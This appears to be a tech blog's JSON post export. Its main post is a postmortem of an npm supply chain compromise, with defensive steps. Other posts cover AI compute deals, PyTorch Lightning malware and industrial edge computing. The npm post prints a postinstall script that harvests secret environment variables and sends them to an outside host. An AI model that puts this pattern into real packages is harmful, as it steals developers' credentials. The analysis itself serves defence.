Security","type":"tags"},{"content":"Last week, one of the most significant npm supply chain attacks in recent memory hit the JavaScript ecosystem. Over 170 packages were compromised, including household names like TanStack\u0026rsquo;s suite of libraries and Mistral AI\u0026rsquo;s official npm client. If you\u0026rsquo;re a JavaScript developer — and statistically, you probably are — there\u0026rsquo;s a good chance one of your projects was affected.\nI\u0026rsquo;ve been tracking supply chain attacks in this series for a while now, from the xz-utils backdoor to the PyTorch Lightning malware. This one is different. It\u0026rsquo;s not a targeted infiltration of a single package — it\u0026rsquo;s a broad, automated campaign that exploited a systemic weakness in how npm tokens are managed. The patterns here mirror earlier npm ecosystem compromises that revealed the structural vulnerability of distributed package ecosystems. Understanding these recurring patterns is essential for broader supply chain security governance across the ecosystem.\nFor a broader perspective on why npm supply chain attacks keep happening and what the industry has learned, check out NPM Supply Chain Security Lessons, which explores the recurring patterns and structural issues in the ecosystem. Understanding how SLSA frameworks and automated verification could have detected this attack is critical for future prevention. Let\u0026rsquo;s dig in.\nWhat Happened # On May 8, 2026, maintainers of TanStack (the project behind TanStack Query, TanStack Router, TanStack Table, and others) discovered that several of their packages had been published with malicious code injected into postinstall scripts. Within hours, it became clear this wasn\u0026rsquo;t an isolated incident — Mistral AI\u0026rsquo;s @mistralai/mistralai client library and over 170 other packages across the npm registry were similarly compromised.\nThe malicious versions contained obfuscated code in their postinstall hooks that would:\nHarvest environment variables (targeting CI/CD secrets, cloud provider credentials, and API keys) Exfiltrate the collected data to attacker-controlled endpoints In some packages, install a persistent reverse shell that would survive container restarts The TanStack team published their postmortem within 48 hours, and it paints a clear picture of how a single compromised npm token can cascade across an entire ecosystem.\nThe Attack Vector: Token Compromise at Scale # This wasn\u0026rsquo;t a sophisticated zero-day exploit or a social engineering campaign targeting individual maintainers. The attack exploited something far more mundane and far more common: leaked npm automation tokens.\nHere\u0026rsquo;s what the postmortem revealed:\nStep 1: Token harvesting. The attacker scraped GitHub Actions workflow logs, public CI/CD configurations, and historically leaked credentials from data breach dumps. npm automation tokens — the tokens used by CI pipelines to publish packages — were the primary target. Unlike granular tokens (introduced by npm in 2022), many of these were classic tokens with full publish access to every package the maintainer owned. Similar token exposure has impacted GitHub Actions CI/CD pipelines when secrets aren\u0026rsquo;t properly rotated and scoped.\nStep 2: Automated publishing. Using the harvested tokens, the attacker ran an automated pipeline that:\nPulled the latest version of each target package Injected the malicious postinstall script Bumped the patch version Published to npm Step 3: Rapid propagation. Because many projects use loose version ranges (^ or ~ prefixes in package.json), the malicious patch versions were automatically pulled into fresh installs and CI builds within minutes.\nThe entire operation — from first malicious publish to detection — took approximately 11 hours. In that window, the compromised packages were downloaded over 1.2 million times.\nInside the Malicious Payload # Let me walk through what the injected code actually did. Understanding the mechanics helps you spot similar patterns in the future.\nThe postinstall script in compromised packages contained something like this (simplified from the obfuscated original):\n// postinstall.js — injected into compromised packages const https = require(\u0026#34;https\u0026#34;); const { execSync } = require(\u0026#34;child_process\u0026#34;); const os = require(\u0026#34;os\u0026#34;); const collect = () =\u0026gt; { const data = { env: Object.fromEntries( Object.entries(process.env).filter(([k]) =\u0026gt; /token|key|secret|password|credential|auth/i.test(k) ) ), hostname: os.hostname(), user: os.userInfo().username, cwd: process.cwd(), npm_package: process.env.npm_package_name, npm_version: process.env.npm_package_version, }; return Buffer.from(JSON.stringify(data)).toString(\u0026#34;base64\u0026#34;); }; const exfil = (payload) =\u0026gt; { const req = https.request({ hostname: \u0026#34;cdn-analytics-events.herokuapp.com\u0026#34;, // disguised as analytics path: `/v2/events?d=${payload}`, method: \u0026#34;GET\u0026#34;, }); req.on(\u0026#34;error\u0026#34;, () =\u0026gt; {}); // silent failure req.end(); }; try { exfil(collect()); } catch (e) { // never throw — don\u0026#39;t break the install } A few things to note about the design:\nIt targets environment variables by pattern. The regex /token|key|secret|password|credential|auth/i catches most CI/CD secret naming conventions. If your CI pipeline has NPM_TOKEN, AWS_SECRET_ACCESS_KEY, or GITHUB_TOKEN in its environment, those were exfiltrated.\nIt fails silently. The try/catch wrapping with an empty error handler ensures the npm install succeeds even if the exfiltration fails. From the developer\u0026rsquo;s perspective, nothing looks wrong.\nThe C2 domain is disguised. Using a Heroku subdomain with \u0026ldquo;analytics\u0026rdquo; in the name makes it blend into network logs. This is a common pattern — attackers don\u0026rsquo;t use evil-c2-server.xyz anymore.\nWhy npm Postinstall Scripts Are the Achilles\u0026rsquo; Heel # This attack reinforces something I\u0026rsquo;ve been saying for years: npm lifecycle scripts are the single biggest attack surface in the JavaScript ecosystem.\nWhen you run npm install, any package in your dependency tree can execute arbitrary code on your machine through lifecycle scripts (preinstall, postinstall, prepare, etc.). This isn\u0026rsquo;t a bug — it\u0026rsquo;s by design. Packages use these hooks for legitimate purposes: compiling native addons, running build steps, or setting up configurations.\nBut it means that every npm install is an implicit trust decision. You\u0026rsquo;re saying: \u0026ldquo;I trust every package in my dependency tree — including all transitive dependencies — to run code on my machine.\u0026rdquo;\nFor context, the broader development tooling and package ecosystem continues to evolve its dependency management practices, but npm\u0026rsquo;s architecture remains particularly vulnerable. A typical Next.js project has 300+ packages in its dependency tree. A fresh create-react-app installation pulls in over 1,400. How many of those have you audited?\nPractical Steps to Protect Your Projects # Here\u0026rsquo;s what I\u0026rsquo;d do right now if I maintained any JavaScript project:\n1. Check If You Were Affected # First, figure out if any of the compromised package versions made it into your projects:\n# Check your lockfile for known compromised versions # TanStack packages: any patch versions published between May 8-9, 2026 npm ls @tanstack/react-query @tanstack/router @tanstack/table 2\u0026gt;/dev/null # Check when your lockfile was last updated git log -1 --format=\u0026#34;%ai\u0026#34; -- package-lock.json # For a broader check, use npm audit npm audit If you installed or updated dependencies between May 8-9, review your lockfile carefully. The compromised versions have been unpublished, but if they\u0026rsquo;re pinned in your lockfile, you\u0026rsquo;ll need to update.\n2. Rotate Your Secrets # If your CI ran npm install during the compromise window, assume your CI environment variables were exfiltrated. Rotate:\nnpm tokens Cloud provider credentials (AWS, GCP, Azure) API keys for any services configured in your CI environment GitHub tokens (especially GITHUB_TOKEN if you use custom PATs) Yes, this is painful. Do it anyway.\n3. Disable Lifecycle Scripts by Default # This is the single most impactful change you can make. Add this to your project\u0026rsquo;s .npmrc:\n# .npmrc — disable postinstall scripts by default ignore-scripts=true Then explicitly allow scripts only for packages that need them (like native addons):\n# Run scripts only when you explicitly choose to npm install --ignore-scripts npm rebuild node-sass # only rebuild what needs native compilation The trade-off is that some packages won\u0026rsquo;t work out of the box — anything that needs a native build step or a postinstall setup will require manual intervention. In my experience, this affects maybe 5% of packages, and the security benefit is worth the friction.\n4. Use Lockfiles and Verify Integrity # If you\u0026rsquo;re not already committing your package-lock.json (or yarn.lock / pnpm-lock.yaml), start now. And use the integrity verification your package manager provides:\n# npm: use ci instead of install in CI pipelines # This installs exactly what\u0026#39;s in the lockfile, no modifications npm ci # pnpm: frozen lockfile mode pnpm install --frozen-lockfile # Yarn: immutable installs yarn install --immutable The npm ci command is critical for CI/CD. Unlike npm install, it won\u0026rsquo;t modify the lockfile and will fail if there\u0026rsquo;s a mismatch between package.json and package-lock.json. If the lockfile was generated before the compromise, npm ci would have rejected the malicious versions.\n5. Switch to Granular npm Tokens # If you\u0026rsquo;re still using classic npm automation tokens, stop. npm\u0026rsquo;s granular access tokens let you restrict publish access to specific packages and set IP allowlists:\n# Create a token that can only publish @yourscope/* packages # Do this through the npm website: npmjs.com → Access Tokens → Generate New Token # Select \u0026#34;Granular Access Token\u0026#34; # Restrict to specific packages # Set CIDR allowlist to your CI provider\u0026#39;s IP ranges A granular token that can only publish @tanstack/react-query from GitHub Actions\u0026rsquo; IP range wouldn\u0026rsquo;t have been useful for compromising any other packages. This is the single biggest thing the ecosystem can do to prevent attacks like this.\n6. Monitor Your Dependencies # Set up automated monitoring so you know when something changes:\n# Socket.dev — analyzes packages for supply chain risks # Add to your CI pipeline npx socket optimize # reviews your dependency tree # Alternatively, use npm\u0026#39;s built-in audit in CI npm audit --audit-level=high if [ $? -ne 0 ]; then echo \u0026#34;Security audit failed\u0026#34; exit 1 fi Tools like Socket.dev go beyond known CVEs — they analyze package behavior, looking for exactly the patterns this attack used: network calls in install scripts, environment variable access, and obfuscated code.\nWhat the Ecosystem Needs to Fix # Individual developers can harden their projects, but this attack exposed systemic issues that need ecosystem-level solutions:\nnpm should disable lifecycle scripts by default. The current default — running arbitrary code from every package in your tree during install — is indefensible. Packages that need install scripts should opt in, and users should explicitly approve them. Deno got this right from day one with its permission system. Node.js needs to catch up.\nToken scoping should be mandatory. Classic npm tokens with unrestricted publish access should be deprecated, with a clear migration timeline. Every automation token should be scoped to specific packages and IP ranges.\nProvenance verification should be the norm. npm\u0026rsquo;s package provenance feature — which cryptographically links published packages to their source repository and build system — should be required for popular packages. If TanStack\u0026rsquo;s packages had provenance verification, the attacker-published versions would have been immediately flagged as not originating from the legitimate CI pipeline.\n# Check if a package has provenance attestation npm audit signatures # This verifies that published packages match their claimed source The registry needs better anomaly detection. Publishing 170+ packages from different maintainer accounts in rapid succession should trigger automated review, not sail through silently.\nLessons for the Broader Ecosystem # This attack will — I hope — accelerate several trends that are already underway:\nThe shift toward pnpm continues to make sense. Its strict dependency resolution prevents phantom dependencies, and its pnpm audit is increasingly sophisticated. If you haven\u0026rsquo;t evaluated pnpm for your projects, now\u0026rsquo;s the time.\nContainer-based CI with minimal environment variable exposure is no longer optional. Your build pipeline should only have access to the secrets it actually needs for each step. Don\u0026rsquo;t give your npm install step access to your deployment credentials.\nVendoring dependencies — keeping a full copy of node_modules in your repo or artifact store — is starting to look less crazy than it did five years ago. It\u0026rsquo;s what Go does with its module proxy, and it eliminates the window between a malicious publish and your next install.\nMy Take # I wrote about the xz-utils attack anniversary last month and warned that the JavaScript ecosystem was overdue for something similar. I didn\u0026rsquo;t expect it to happen this quickly, or at this scale.\nWhat frustrates me most about this incident isn\u0026rsquo;t the attack itself — it\u0026rsquo;s the predictability of it. Leaked npm tokens have been a known problem for years. Unrestricted lifecycle scripts have been debated since at least 2018. Granular tokens exist but adoption is low. We had all the tools to prevent this, and we collectively didn\u0026rsquo;t use them.\nThe TanStack team deserves credit for their rapid, transparent response. Their postmortem is a model of what incident communication should look like — clear timelines, honest about what they don\u0026rsquo;t know, and specific about remediation steps. If you maintain open-source packages, bookmark it as a template.\nBut the 170+ other affected packages tell a bigger story: the npm ecosystem is still running on trust, and that trust keeps getting exploited. Until the defaults change — scripts off, tokens scoped, provenance required — we\u0026rsquo;re going to keep having these conversations.\nLock down your tokens. Disable your lifecycle scripts. Audit your dependencies. The next attack is already being planned.\nThis post is part of my Supply Chain Security series, where I track real-world attacks and share practical defenses. If the npm ecosystem is central to your work, I also cover related ground in my JavaScript \u0026amp; Node.js series.\n","date":"12 May 2026","externalUrl":null,"permalink":"/posts/260512-tanstack-npm-supply-chain-compromise/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A massive npm supply chain attack compromised TanStack, Mistral AI’s client library, and over 170 packages. Here’s what happened, how the attack worked, and the practical steps you should take today to protect your projects.","title":"TanStack NPM Supply Chain Compromise — Postmortem, Attack Vectors, and How to Protect Your Projects","type":"posts"},{"content":"I woke up yesterday to the news that Anthropic had taken the entire Colossus 1 data centre off SpaceX\u0026rsquo;s hands — 300+ megawatts, roughly 220,000 NVIDIA GPUs, in one signature. Same day, they doubled Claude Code\u0026rsquo;s rate limits and bumped Opus API ceilings. The press release reads like a product update; the contract underneath it reads like a land grab.\nI have been writing about model releases for years now, and I will admit that until very recently I treated compute as a supporting actor in this story. Parameter counts mattered. Architectures mattered. Compute was the boring infrastructure paragraph at the end. That framing is no longer accurate. When you stack Anthropic\u0026rsquo;s deals together — five gigawatts of AWS Trainium, five gigawatts of Google and Broadcom TPUs, the thirty-billion-dollar Azure commitment, the fifty-billion-dollar Fluidstack arrangement, and now SpaceX\u0026rsquo;s Colossus — what you are looking at is a company spending money on substations and floor space at a rate that would make a hyperscaler blink. This mirrors the broader infrastructure trends we\u0026rsquo;ve seen at Google Cloud Next 2026 and NVIDIA\u0026rsquo;s GTC roadmap, where capacity has become the bottleneck.\nThat is the moat. Not the model weights. Not the alignment work. The watts.\nWhat Anthropic Actually Bought # Colossus 1 is a single facility. Three hundred megawatts is a serious load — somewhere between a large hospital campus and a small city\u0026rsquo;s residential draw. The GPU count of around 220,000 is the headline number, but the more interesting number is the power envelope, because that constrains what you can do next. You can swap GPUs. You cannot easily swap a substation.\nThe same-day rate-limit changes are the giveaway. Anthropic is signalling that it has the inference headroom to let people hammer the APIs harder. If you are running Claude Code in a tight loop or pushing Opus through a research pipeline, you should feel that almost immediately. The capacity is already paid for; they want it utilised.\nWhat is genuinely new here is the willingness to take a single-tenant facility wholesale. Most AI companies still rent racks inside hyperscaler footprints. Buying out a colo on this scale is closer to how the cloud providers themselves grow.\nThe Multi-Silicon Strategy # Anthropic is now running production workloads on at least three different silicon families: NVIDIA GPUs (the SpaceX inheritance and AWS GPU instances), AWS Trainium (their long-running custom-silicon partnership), and Google\u0026rsquo;s TPUs through the Broadcom deal. That is not an accident, and it is not vendor-neutral diplomacy. It is a deliberate hedge.\nI have audited enough cloud architectures to recognise the pattern. When a single workload is portable across three different accelerators, you have negotiating leverage on every renewal. You have failover when one supply chain hiccups. You have the option to route training to whichever silicon the next breakthrough lands on. The cost is engineering complexity — your kernels, your compilers, your inference runtime all have to abstract the hardware — and Anthropic has decided that cost is worth paying.\nFor developers, this matters in a quiet way. The endpoint you call does not change. But the unit economics behind that endpoint are now spread across vendors who all want the workload, which is structurally healthier for prices than a single-supplier dependency. Understanding Claude\u0026rsquo;s in-context learning capabilities alongside this infrastructure commitment shows how Anthropic is investing across the stack — from model innovation to physical infrastructure.\nWhy This Reframes the Race # For a few years, the conversation about frontier AI was about who had the smartest researchers and the cleanest data. Those things still matter. But the rate-limiting step has moved.\nA few concrete pressures:\nPower, not chips. GPU shortages dominated 2023 and 2024. The current bottleneck is interconnect-grade power and cooling at scale. You can fab more chips faster than you can permit a substation. Multi-year lead times. A new hyperscale build is a three-to-five-year project. Anthropic taking over a finished facility is, effectively, time travel — they get capacity now that a greenfield project would only deliver in 2029. Capex front-loading. When you commit to multi-gigawatt deals years in advance, your model pricing has to reflect amortisation, not marginal cost. That sets a floor under API prices that competitors without those commitments cannot meet. The companies that can afford this kind of forward commitment are the ones that get to set the pace. The ones that cannot are going to find themselves renting from the ones that did.\nWhat This Means for the APIs You Build On # If you are a senior developer making bets on which model provider to integrate with, this changes the calculus a little.\nCapacity is a feature. Rate limits, queue depth, p99 latency under load — these are downstream of how much compute the provider has on tap. A provider with three years of pre-paid gigawatts can absorb your spike traffic in a way that a provider buying spot capacity cannot.\nLock-in is sneakier. Once you have built around a provider\u0026rsquo;s tooling — Claude Code, the Anthropic SDK quirks, the specific evals you have tuned against — switching costs accumulate. Capacity moats reinforce that. The provider who can guarantee throughput is the one whose ecosystem you trust to put more weight on.\nPricing will not collapse. The story that frontier-model APIs would race to commodity pricing was always optimistic. With this much capex committed, the providers need every dollar of revenue. Expect plateaued pricing for top-tier models and aggressive price cuts only on the older tiers being depreciated off the books.\nI am not saying any of this is bad for developers. A provider with stable capacity, predictable pricing, and a real engineering bench is what most production teams actually want. It does mean the romantic version of the story — scrappy lab beats incumbent on cleverness alone — is harder to believe each quarter.\nMy Take # I have watched this industry go through several waves where the moat shifted underneath everyone. In the 1990s it was operating-system distribution. In the 2000s it was search index quality. In the 2010s it was hyperscale data infrastructure. Each time, the people who saw the shift early bought the unsexy thing — distribution channels, web crawlers, fibre — while everyone else was still arguing about the visible layer. AI is in that pattern now. The visible layer is benchmark scores and demo videos. The unsexy thing is grid interconnects. The companies that get infrastructure right early will dominate for years, much like how cloud FinOps engineering is becoming critical to competitive advantage.\nWhat I find interesting is how openly Anthropic is moving. There is no pretence that this is a research bet. Three hundred megawatts in one purchase is a statement about industrial capacity, and the same-day rate-limit increase is a statement that they are going to use it. If the next generation of frontier models is going to come from whichever lab has the most watts in production, then the question for the rest of us is no longer which model is best, but which provider\u0026rsquo;s capacity you trust enough to build on for the next five years. That is a more sober question than the one we were asking a year ago, and I think it is the right one.\n","date":"7 May 2026","externalUrl":null,"permalink":"/posts/260507-anthropic-compute-moat/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic just bought all 300+ MW of SpaceX’s Colossus 1 data centre. Stacked next to its multi-gigawatt deals with AWS, Google, Azure and Fluidstack, the frontier-model race has quietly become a power-and-real-estate race — and that changes what developers can expect from these APIs.","title":"Anthropic's SpaceX Deal — How Compute Capacity Became the Real AI Moat","type":"posts"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/aws/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AWS","type":"tags"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/cloud/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Cloud","type":"tags"},{"content":"","date":"7 May 2026","externalUrl":null,"permalink":"/tags/infrastructure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Infrastructure","type":"tags"},{"content":"","date":"30 April 2026","externalUrl":null,"permalink":"/tags/python/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Python","type":"tags"},{"content":"This week the security community was rattled by the discovery of \u0026ldquo;Shai-Hulud\u0026rdquo; — a cleverly themed malware campaign that managed to infiltrate the PyTorch Lightning AI training library. Named after the giant sandworms of Frank Herbert\u0026rsquo;s Dune universe, this attack is a stark reminder that the AI/ML ecosystem\u0026rsquo;s rapid growth has created supply chain vulnerabilities that we\u0026rsquo;re only beginning to understand. This echoes earlier major compromises like the TanStack npm supply chain attack and Ultralytics supply chain compromise, showing how critical infrastructure remains vulnerable.\nAs someone who\u0026rsquo;s watched supply chain attacks evolve from simple typosquatting to increasingly sophisticated infiltration techniques, this one stands out. It\u0026rsquo;s not just that the target was a widely-used AI library — it\u0026rsquo;s the method and the implications for every team running ML training pipelines in production.\nWhat Happened # The Shai-Hulud malware was discovered embedded within the PyTorch Lightning library, a popular framework that simplifies PyTorch model training and is used by thousands of research labs, startups, and enterprises worldwide. The malware was designed to be stealthy — activating only during specific training operations and exfiltrating model weights, training data metadata, and cloud credentials from the host environment.\nWhat makes this particularly insidious is the activation pattern. Unlike traditional malware that phones home immediately, Shai-Hulud would lie dormant until it detected GPU-accelerated training runs, then piggyback on the legitimate network traffic patterns that ML training jobs generate. If you\u0026rsquo;re already sending hundreds of megabytes of gradient updates to a distributed training cluster, a few extra kilobytes of exfiltrated data barely registers.\nThe Dune theming wasn\u0026rsquo;t just for aesthetics either — the command-and-control infrastructure used domain names referencing Arrakis, spice melange, and other Dune terminology, making the traffic appear to casual observers like someone\u0026rsquo;s hobby project rather than a malicious operation.\nWhy AI/ML Supply Chains Are Uniquely Vulnerable # The Python packaging ecosystem has long been a soft target, but the AI/ML corner of it presents amplified risks that we need to take seriously:\nMassive dependency trees: A typical ML training setup pulls in dozens of packages — PyTorch, Lightning, transformers, datasets, tokenizers, and their transitive dependencies. Each one is a potential entry point. I\u0026rsquo;ve audited projects where pip install pulls in over 200 packages, and I guarantee nobody is reviewing every line of code in that tree.\nElevated privileges by default: ML training jobs routinely run with access to GPUs, large datasets, cloud storage credentials, and significant compute resources. Unlike a web application where you might follow the principle of least privilege, training scripts often need broad access to function properly. That means any compromised dependency inherits those permissions.\nLong-running, unattended processes: Training runs can last hours or days. They\u0026rsquo;re typically kicked off and left alone until completion. This gives malware a long window to operate without human oversight — a luxury that web-serving malware doesn\u0026rsquo;t enjoy.\nCulture of pip install and go: I\u0026rsquo;ve seen teams — smart, experienced teams — copy training scripts from GitHub repos and run them with minimal review. The AI/ML community\u0026rsquo;s emphasis on rapid experimentation sometimes comes at the expense of security hygiene. When a new paper drops and the reference implementation is available, the instinct is to clone, install, and run.\nPractical Defenses That Actually Work # After thirty years in this industry, I\u0026rsquo;ve learned that the most effective security measures are the ones people will actually follow. Here\u0026rsquo;s what I\u0026rsquo;d recommend for any team running ML workloads:\nPin your dependencies with hashes. Don\u0026rsquo;t just pin versions — use pip install --require-hashes with a locked requirements file. This ensures you\u0026rsquo;re getting exactly the package artifacts you\u0026rsquo;ve verified, not a compromised version that happens to share the same version number. Tools like pip-compile from pip-tools make this manageable.\nIsolate your training environments. Run training jobs in containers with restricted network access. Your training container should be able to reach your data store and your model registry, and nothing else. If a compromised package tries to phone home, the connection should fail. Yes, this takes more setup work. No, it\u0026rsquo;s not optional anymore.\nAudit your base images. If you\u0026rsquo;re building on top of NVIDIA\u0026rsquo;s CUDA containers or pre-built ML images, understand what\u0026rsquo;s in them. Use tools like Syft to generate SBOMs and Grype to scan for known vulnerabilities.\nMonitor egress traffic from training jobs. This is where Shai-Hulud would have been caught earlier. Legitimate training jobs have predictable network patterns — they talk to data stores, model registries, and maybe a metrics server. Any unexpected outbound connections should trigger an alert.\nConsider using verified package mirrors. Rather than pulling directly from PyPI, maintain an internal mirror with only approved packages. Companies like JFrog Artifactory and AWS CodeArtifact support this, and it gives you a chokepoint where you can scan packages before they enter your environment.\nThe Bigger Picture: AI Infrastructure as Critical Infrastructure # This incident arrives at a time when AI training infrastructure is increasingly being treated as critical. Companies are spending millions on GPU clusters, training runs represent months of work, and the resulting models are core business assets. Yet the software supply chain underpinning all of this is held together with the same setup.py and pyproject.toml files that power every other Python project.\nWe\u0026rsquo;ve seen this pattern before. Remember when the Node.js ecosystem had its reckoning with npm attacks? I wrote about the broader supply chain security landscape and SLSA adoption recently, and the Python ML ecosystem is hitting its own version of that moment. The broader development tooling and package management ecosystem shares these supply chain risks across multiple languages. Learning from xz Utils aftermath and npm security lessons, the stakes are higher because the assets at risk — trained models, training data, cloud infrastructure — are significantly more valuable.\nMy Take # I\u0026rsquo;ll be honest: I\u0026rsquo;ve been waiting for an attack like this. Not hoping for it, but expecting it. The combination of high-value targets, complex dependency chains, and a culture of rapid prototyping made the AI/ML supply chain an inevitable target.\nWhat concerns me most is the detection gap. Shai-Hulud was active for an unknown period before discovery, and we still don\u0026rsquo;t have a full picture of its impact. How many model weights were exfiltrated? How many cloud credentials were compromised? These are questions that affected organizations are still trying to answer.\nThe Dune theming is almost darkly funny — in the books, the sandworms are hidden beneath the surface, striking without warning. That\u0026rsquo;s exactly how supply chain attacks work. You can\u0026rsquo;t see them until it\u0026rsquo;s too late, unless you\u0026rsquo;ve built the right detection infrastructure. Building observability into ML systems requires comprehensive logging and monitoring to detect these kinds of anomalous patterns before they cause damage.\nIf your team is running ML training pipelines, this week\u0026rsquo;s news is your wake-up call. Lock down your dependencies, isolate your training environments, and monitor your network traffic. The sandworms are real, and they\u0026rsquo;re hungry.\nThis post is part of my Security in Practice series, where I cover real-world security incidents and practical defenses. The AI supply chain is a topic I expect to return to — unfortunately, I don\u0026rsquo;t think Shai-Hulud will be the last of its kind.\n","date":"30 April 2026","externalUrl":null,"permalink":"/posts/260430-pytorch-lightning-supply-chain-malware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A Dune-themed malware campaign targeting the PyTorch Lightning library highlights how AI/ML supply chains are becoming prime targets for sophisticated attacks.","title":"Supply Chain Malware in PyTorch Lightning — When AI Infrastructure Becomes the Attack Surface","type":"posts"},{"content":"","date":"23 April 2026","externalUrl":null,"permalink":"/tags/azure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Azure","type":"tags"},{"content":"This week brought dueling announcements from AWS and Azure around industrial edge computing, and it\u0026rsquo;s clear that the cloud giants see manufacturing and industrial IoT as the next major growth frontier. AWS expanded its IoT Greengrass V3 platform with new ML inference capabilities at the edge, while Azure announced preview availability of Azure IoT Operations — a Kubernetes-based edge runtime designed for factory environments. Having spent a chunk of my career working on IoT systems before \u0026ldquo;IoT\u0026rdquo; was even a term, these developments feel like a significant inflection point. Understanding how cloud platforms are evolving and Kubernetes is maturing for edge deployments is essential context for this shift.\nThe Industrial Edge Opportunity # Here\u0026rsquo;s why the cloud providers are so interested in the factory floor: manufacturing represents one of the largest untapped markets for cloud services. Factories generate enormous amounts of data from sensors, PLCs, SCADA systems, and machine vision cameras, but most of that data is processed locally using proprietary industrial control systems and never touches the cloud.\nThe promise of industrial edge computing is to bring cloud-native capabilities — ML inference, data analytics, fleet management, over-the-air updates — to these environments without requiring all the data to travel to a distant cloud region. This isn\u0026rsquo;t just about cost savings on data transfer; it\u0026rsquo;s about latency requirements. When you\u0026rsquo;re controlling a robotic arm or monitoring a safety-critical process, you can\u0026rsquo;t afford the 50-200ms round trip to a cloud region. Decisions need to happen in single-digit milliseconds. This is why observability and networking infrastructure become critical at the edge.\nThe total addressable market is staggering. McKinsey estimates that IoT applications in factory settings alone could generate $1.2-3.7 trillion in value annually by 2030. Even capturing a small slice of that is enormous for cloud providers whose core markets are maturing.\nWhat AWS Announced # AWS IoT Greengrass V3 is an evolution of their edge runtime that runs on industrial gateways and edge servers. The new ML inference pipeline is the standout feature — you can now deploy SageMaker-trained models to Greengrass devices and run inference locally with hardware acceleration on NVIDIA Jetson, Intel Movidius, and AWS\u0026rsquo;s own Graviton-based edge hardware.\nThe practical application is predictive maintenance. Deploy a vibration analysis model to a gateway connected to dozens of motors and pumps, run inference on sensor data locally, and only send anomaly alerts to the cloud. I\u0026rsquo;ve built similar systems from scratch, and the amount of custom plumbing required was substantial. Having this as a managed service significantly lowers the barrier.\nAWS also introduced Greengrass Streams Manager for buffered data ingestion, which handles the messiest part of industrial IoT: unreliable connectivity. Factory networks are noisy, connections drop, and you need to guarantee that sensor data isn\u0026rsquo;t lost when the WAN link goes down. Streams Manager provides local buffering with configurable retention and prioritization, syncing to cloud storage when connectivity is available.\nWhat Azure Announced # Azure IoT Operations takes a different architectural approach. Rather than building a proprietary edge runtime, Microsoft is going all-in on Kubernetes at the edge. Azure IoT Operations runs on Arc-enabled K3s clusters — lightweight Kubernetes distributions designed for resource-constrained environments.\nThis is a bold bet. Running Kubernetes on an industrial gateway with 4GB of RAM and an ARM processor sounds like madness if you\u0026rsquo;ve only seen Kubernetes in the data center. But K3s has matured to the point where it\u0026rsquo;s genuinely viable on modest hardware, and the operational benefits are significant. You get the same deployment model, observability stack, and security posture at the edge as you do in the cloud.\nThe platform includes MQTT broker integration, OPC-UA connectivity for industrial protocols, and a data pipeline framework that processes and transforms sensor data before forwarding it to Azure services. The OPC-UA support is crucial — it\u0026rsquo;s the lingua franca of industrial automation, and any serious IoT platform needs native support for it.\nMicrosoft is also leveraging its acquisition of AT\u0026amp;T\u0026rsquo;s Network Cloud operations to provide private 5G connectivity for factories. This addresses the networking challenge directly: instead of relying on flaky WiFi or running Ethernet to every sensor, factories can deploy private 5G cells that provide reliable, low-latency connectivity across the facility.\nThe Convergence of OT and IT # What excites me most about these announcements is the convergence of operational technology (OT) and information technology (IT). Historically, factory automation was a completely separate world from cloud computing. Different protocols (Modbus, PROFINET, EtherCAT vs. HTTP, gRPC), different tooling (PLCs, HMIs, SCADA vs. containers, CI/CD), and different teams that rarely talked to each other.\nEdge computing platforms are bridging this gap. When you can run a container on an industrial gateway that speaks OPC-UA to a PLC and MQTT to a cloud broker, you\u0026rsquo;ve created a common layer where OT and IT can collaborate. Factory engineers can focus on the physical processes while software engineers handle the data pipeline and ML models.\nBut this convergence also brings challenges. Industrial systems have safety requirements that cloud systems don\u0026rsquo;t. A misconfigured container won\u0026rsquo;t kill anyone in a data center, but an incorrect signal to a safety controller in a factory absolutely could. Both AWS and Azure need to ensure their edge platforms integrate properly with safety instrumented systems (SIS) and don\u0026rsquo;t introduce new failure modes into critical processes.\nMy Take # I\u0026rsquo;m genuinely excited about industrial edge computing, but I\u0026rsquo;ve been in this industry long enough to remember the early IoT hype cycle of 2015-2018 and how long it took for the reality to catch up with the marketing. The technology is significantly better now, and the cloud providers are committing serious engineering resources rather than just marketing dollars.\nThe choice between AWS and Azure for industrial IoT will often come down to existing cloud relationships and specific industry partnerships. AWS has a head start in general-purpose IoT, while Azure has stronger enterprise relationships and the advantage of integrating with the Microsoft ecosystem that many manufacturers already use.\nIf you\u0026rsquo;re an engineering team looking at industrial edge computing, my advice is to start small. Pick one production line, one use case (predictive maintenance is the easiest win), and build a proof of concept. The platforms are mature enough for production use, but the organizational change management — getting IT and OT teams to collaborate effectively — is usually the harder challenge. For cost management at scale, cloud FinOps practices become essential when edge deployments grow beyond single proof-of-concepts.\nThis is part of my ongoing Infrastructure Notes series, covering developments in cloud, infrastructure, and operational technology.\n","date":"23 April 2026","externalUrl":null,"permalink":"/posts/260423-edge-computing-industrial-iot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS and Azure are aggressively expanding their edge computing offerings for industrial IoT, bringing cloud-native tooling to factory floors and field operations.","title":"Edge Computing Meets IoT — AWS and Azure Race to the Factory Floor","type":"posts"},{"content":"","date":"23 April 2026","externalUrl":null,"permalink":"/tags/iot/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"IoT","type":"tags"},{"content":"","date":"20 April 2026","externalUrl":null,"permalink":"/tags/kubernetes/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Kubernetes","type":"tags"},{"content":"Kubernetes has reached a maturity level where success means invisibility. The platform has gone from \u0026ldquo;exciting but rough\u0026rdquo; to \u0026ldquo;infrastructure that just works,\u0026rdquo; which is exactly what you want from the foundation of your system.\nThe Maturity Arc # Kubernetes 1.32 represents the platform at its current state: steady, backward-compatible improvements focused on operational experience rather than dramatic new capabilities. The sidecar graduation, improved resource management, and simplified policy enforcement reflect a platform that understands its users\u0026rsquo; constraints and addresses real problems.\nThis wasn\u0026rsquo;t always the case. The early 